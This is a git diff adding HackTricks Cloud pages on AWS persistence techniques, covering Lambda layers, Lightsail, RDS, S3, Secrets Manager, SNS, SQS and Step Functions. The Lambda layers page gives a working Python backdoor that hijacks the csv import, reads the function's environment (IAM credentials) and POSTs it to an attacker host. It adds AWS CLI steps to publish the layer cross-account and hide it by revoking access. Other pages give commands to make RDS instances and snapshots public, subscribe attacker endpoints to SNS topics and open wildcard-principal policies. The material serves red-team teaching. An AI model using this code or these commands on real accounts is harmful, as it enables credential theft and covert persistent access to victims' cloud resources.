+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md new file mode 100644 index 0000000000..dd762e60e1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md @@ -0,0 +1,160 @@ +# AWS - Lambda Layers Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lambda Layers + +A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. + +It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. + +By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. + +Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. + +### Python load path + +The load path that Python will use in lambda is the following: + +``` +['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages'] +``` + +Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** + +{% hint style="danger" %} +If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. 
+{% endhint %} + +Therefore, the requisites are: + +* **Check libraries** that are **loaded** by the victims code +* Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. + +### Preloaded libraries + +{% hint style="warning" %} +When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ +In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. +{% endhint %} + +With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: + +```python +import sys + +def lambda_handler(event, context): + return { + 'statusCode': 200, + 'body': str(sys.modules.keys()) + } +``` + +And this is the **list** (check that libraries like `os` or `json` are already there) + +``` +'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 
'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function' +``` + +And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) + +### Lambda Layer Backdooring + +In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**. 
+ +For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\ +Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ +This file must: + +* Execute our payload +* Load the original csv library + +We can do both with: + +```python +import sys +from urllib import request + +with open("/proc/self/environ", "rb") as file: + url= "https://attacker13123344.com/" #Change this to your server + req = request.Request(url, data=file.read(), method="POST") + response = request.urlopen(req) + +# Remove backdoor directory from path to load original library +del_path_dir = "/".join(__file__.split("/")[:-2]) +sys.path.remove(del_path_dir) + +# Remove backdoored loaded library from sys.modules +del sys.modules[__file__.split("/")[-2]] + +# Load original library +import csv as _csv + +sys.modules["csv"] = _csv +``` + +Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer. + +You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) + +The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: + +{% content-ref url="../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %} +[aws-warm-lambda-persistence.md](../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) +{% endcontent-ref %} + +### External Layers + +Note that it's possible to use **lambda layers from external accounts**. 
Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\ +Also note that the **max number of layers a lambda can have is 5**. + +Therefore, in order to improve the versatility of this technique an attacker could: + +* Backdoor an existing layer of the user (nothing is external) +* **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. + * The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) + * The victim **won't see external layers** used with **`aws lambda list-layers`** + +{% code overflow="wrap" %} +```bash +# Upload backdoor layer +aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" + +# Give everyone access to the lambda layer +## Put the account number in --principal to give access only to an account +aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion + +## Add layer to victims Lambda + +# Remove permissions +aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md new file mode 100644 index 0000000000..77290eacb5 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md @@ -0,0 +1,59 @@ +# AWS - Lightsail Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Lightsail + +For more information check: + +{% content-ref url="../aws-services/aws-lightsail-enum.md" %} +[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) +{% endcontent-ref %} + +### Download Instance SSH keys & DB passwords + +They won't be changed probably so just having them is a good option for persistence + +### Backdoor Instances + +An attacker could get access to the instances and backdoor them: + +* Using a traditional **rootkit** for example +* Adding a new **public SSH key** +* Expose a port with port knocking with a backdoor + +### DNS persistence + +If domains are configured: + +* Create a subdomain pointing your IP so you will have a **subdomain takeover** +* Create **SPF** record allowing you to send **emails** from the domain +* Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md new file mode 100644 index 0000000000..6416216621 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md @@ -0,0 +1,61 @@ +# AWS - RDS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## RDS + +For more information check: + +{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} +[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) +{% endcontent-ref %} + +### Make instance publicly accessible: `rds:ModifyDBInstance` + +An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. + +{% code overflow="wrap" %} +```bash +aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately +``` +{% endcode %} + +### Create an admin user inside the DB + +An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. + +### Make snapshot public + +{% code overflow="wrap" %} +```bash +aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md new file mode 100644 index 0000000000..c821dbd6a8 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md @@ -0,0 +1,51 @@ +# AWS - S3 Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## S3 + +For more information check: + +{% content-ref url="../aws-services/aws-s3-athena-and-glacier-enum.md" %} +[aws-s3-athena-and-glacier-enum.md](../aws-services/aws-s3-athena-and-glacier-enum.md) +{% endcontent-ref %} + +### KMS Client-Side Encryption + +When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: + +
+ +Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. + +### Using S3 ACLs + +Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md new file mode 100644 index 0000000000..9349605bc7 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md @@ -0,0 +1,79 @@ +# AWS - Secrets Manager Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Secrets Manager + +For more info check: + +{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} +[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) +{% endcontent-ref %} + +### Via Resource Policies + +It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. + +### Via Secrets Rotate Lambda + +To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. + +This is how lambda code for such action could look like: + +```python +import boto3 + +def rotate_secrets(event, context): + # Create a Secrets Manager client + client = boto3.client('secretsmanager') + + # Retrieve the current secret value + secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] + + # Rotate the secret by updating its value + new_secret_value = rotate_secret(secret_value) + client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) + +def rotate_secret(secret_value): + # Perform the rotation logic here, e.g., generate a new password + + # Example: Generate a new password + new_secret_value = generate_password() + + return new_secret_value + +def generate_password(): + # Example: Generate a random password using the secrets module + import secrets + import string + password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) + return password +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team 
Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md new file mode 100644 index 0000000000..cb0b70d826 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md @@ -0,0 +1,107 @@ +# AWS - SNS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SNS + +For more information check: + +{% content-ref url="../aws-services/aws-sns-enum.md" %} +[aws-sns-enum.md](../aws-services/aws-sns-enum.md) +{% endcontent-ref %} + +### Persistence + +When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__default_statement_ID", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "SNS:Publish", + "SNS:RemovePermission", + "SNS:SetTopicAttributes", + "SNS:DeleteTopic", + "SNS:ListSubscriptionsByTopic", + "SNS:GetTopicAttributes", + "SNS:AddPermission", + "SNS:Subscribe" + ], + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", + "Condition": { + "StringEquals": { + "AWS:SourceOwner": "318142138553" + } + } + }, + { + "Sid": "__console_pub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Publish", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + }, + { + "Sid": "__console_sub_0", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "SNS:Subscribe", + "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" + } + ] +} +``` + +### Create Subscribers + +To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. + +Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. 
+ +```bash +aws sns subscribe --region \ + --protocol http \ + --notification-endpoint http:/// \ + --topic-arn +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md new file mode 100644 index 0000000000..88c12a5495 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md @@ -0,0 +1,68 @@ +# AWS - SQS Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SQS + +For more information check: + +{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} +[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) +{% endcontent-ref %} + +### Using resource policy + +In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ +The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: + +```json +{ + "Version": "2008-10-17", + "Id": "__default_policy_ID", + "Statement": [ + { + "Sid": "__owner_statement", + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": [ + "SQS:*" + ], + "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" + } + ] +} +``` + +{% hint style="info" %} +You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} +{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md new file mode 100644 index 0000000000..08cd69c5f3 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md @@ -0,0 +1,2 @@ +# AWS - SSM Perssitence + diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md new file mode 100644 index 0000000000..0c7b2c9e49 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md @@ -0,0 +1,47 @@ +# AWS - Step Functions Persistence + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Step Functions + +For more information check: + +{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} +[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) +{% endcontent-ref %} + +### Step function Backdooring + +Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. + +### Backdooring aliases + +If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
